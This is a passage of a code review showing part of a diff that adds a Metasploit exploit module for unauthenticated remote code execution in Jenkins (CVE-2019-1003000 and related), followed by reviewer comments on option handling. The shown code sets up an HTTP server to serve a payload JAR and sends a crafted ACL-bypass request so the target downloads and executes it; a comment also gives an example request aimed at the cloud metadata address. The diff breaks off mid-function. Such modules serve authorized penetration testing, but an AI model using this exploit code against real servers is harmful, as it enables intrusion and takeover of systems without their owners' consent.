modules/exploits/multi/http/jenkins_metaprogramming.rb

```diff
@@ -0,0 +1,159 @@
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Jenkins ACL Bypass and Metaprogramming RCE',
+      'Description'    => %q{
+        This module exploits a vulnerability in Jenkins dynamic routing to
+        bypass the Overall/Read ACL and leverage Groovy metaprogramming to
+        download and execute a malicious JAR file.
+      },
+      'Author'         => [
+        'Orange Tsai', # Discovery and PoC
+        'wvu'          # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2019-1003000'], # Script Security
+        ['CVE', '2019-1003001'], # Pipeline: Groovy
+        ['CVE', '2019-1003002'], # Pipeline: Declarative
+        ['EDB', '46427'],
+        ['URL', 'https://jenkins.io/security/advisory/2019-01-08/'],
+        ['URL', 'https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html'],
+        ['URL', 'https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html']
+      ],
+      'DisclosureDate' => '2019-01-08', # Public disclosure
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)', {}]
+      ],
+      'DefaultTarget'  => 0,
+      'Notes'          => {
+        'Stability'    => [CRASH_SAFE],
+        'SideEffects'  => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+        'Reliability'  => [REPEATABLE_SESSION]
+      },
+      'Stance'         => Stance::Aggressive # Be aggressive, b-e aggressive!
+    ))
+
+    register_options([
+      Opt::RPORT(8080)
+    ])
+
+    deregister_options('URIPATH')
+  end
+
+  def on_request_uri(cli, request)
+    vprint_status("#{request.uri} requested")
+
+    unless request.uri.end_with?('.jar')
+      vprint_error('Sending 404')
+      send_not_found(cli)
+      return
+    end
+
+    vprint_good('Sending payload JAR')
+    send_response(
+      cli,
+      payload_jar,
+      'Content-Type' => 'application/java-archive'
+    )
+  end
+
+  def exploit
+    # HACK: Both HttpClient and HttpServer use datastore['SSL']
+    ssl = datastore['SSL']
+    datastore['SSL'] = false
+    start_service('Path' => '/metasploit/exploit/1.0/exploit-1.0.jar')
+    datastore['SSL'] = ssl
+
+    send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => go_go_gadget1,
+      'vars_get' => {'value' => go_go_gadget2}
+    )
+  end
+
+=begin
+  http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
+  ?apiUrl=http://169.254.169.254/%23
+  &login=orange
+  &password=tsai
+=end
+  def go_go_gadget1
+    normalize_uri(
+      '/securityRealm/user/admin', # ACL bypass
```

Comment:
can we support the `URIPATH` option and prepend it to the URL?

Reply:
`URIPATH` is for `HttpServer`, but I plan to make it a configurable `@Grab` group name if possible.

Reply:
i am thinking of a situation where the target URL is something like `http://localhost/random/my-jenkins/securityRealm/user/admin`.

Reply:
Oh, duh. That would be `TARGETURI`. Looks like I'm not using any mixins that would pull that in. Is there ANY good reason `HttpClient` does't just register it itself?

Reply:
I suppose because it shouldn't be exposed to the user if it isn't used. Sigh.

Reply:
Updated. Coincidentally, it makes the `normalize_uri` actually do something (there was no user input before).

Reply:
And for the record, it appears that `admin` can be any random string, but it will introduce a fake user in Jenkins.